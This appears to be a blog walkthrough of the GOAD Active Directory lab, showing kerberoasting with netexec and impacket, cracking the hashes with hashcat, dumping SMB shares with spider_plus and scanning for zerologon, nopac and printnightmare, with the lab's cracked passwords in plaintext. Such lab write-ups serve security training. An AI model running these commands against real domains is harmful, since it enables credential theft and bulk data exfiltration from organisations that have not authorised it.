Skip to main content
  1. Posts/

GOAD Part 2: Domain Enumeration

·2 mins
Table of Contents

Introduction #

  • In the previous walkthrough we exploited various misconfigurations and obtained some valid domain user credentials.
  • With valid credentials, we can perform more enumeration using tools like bloodhound and also explore various attacks such as kerberoasting. We will explore kerberoasting and domain enumeration using bloodhound…..

Kerberoasting in the north domain #

image

  • With our valid credentials we can try and abuse kerberoasting to obtain more credential material that can grant further access to systems and data.

  • Kerberoasting involves attempting to crack passwords of service accounts by exploiting the Kerberos authentication protocol.

  • We obtain service tickets associated with these accounts and then perform offline password cracking.

  • Using netexec:

nxc ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

image

  • Using impacket:
impacket-GetUserSPNs -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople

image

  • We obtain 3 kerberoastable users: sansa.stark, jon.snow and sql_svc

Cracking with hashcat #

  • Running hashcat in the following mode with a rockyou password list:

image

  • we get the plaintext credentials of the jon.snow user.
hashcat -m 13100 -a 0 KERBEROASTING /usr/share/wordlists/rockyou.txt.gz

image

jon.snow: iknownothing

Spidering and Dumping Shares #

image

  • Check for shares and permissions on them
 nxc smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares

image

  • Dump all files from all the readable shares
 nxc smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M spider_plus -o DOWNLOAD_FLAG=TRUE

image

  • We have a couple of interesting dumped files

image

  • We discover credentials to jeor.mormont user.

image

jeor.mormont: _L0ngCl@w_

image

Known Vulnerabilities #

image

  • Some of these vulnerabilities require credentials to enumerate so we will use a domain user’s credentials with netexec, to check the various known vulnerabilities
 nxc smb 192.168.56.10-23 -u 'jon.snow' -p 'iknownothing' -M zerologon -M nopac -M printnightmare -M smbghost -M ms17-010
  • We are able to identify printnightmare and nopac on winterfell:

image